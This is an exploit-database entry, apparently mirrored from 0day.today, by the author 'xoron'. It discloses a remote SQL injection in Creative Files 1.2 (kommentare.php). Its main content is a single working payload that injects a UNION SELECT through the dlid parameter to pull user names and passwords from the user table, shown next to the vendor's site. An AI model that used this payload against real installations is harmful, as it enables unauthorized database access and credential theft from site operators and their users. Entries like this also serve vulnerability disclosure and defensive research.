id: 1601
date: 03/16/2007
title: Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerability
author: xoron
cves: 

======================================================================
Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerability
======================================================================




======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php)  Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================



#  0day.today [2023-03-26]  #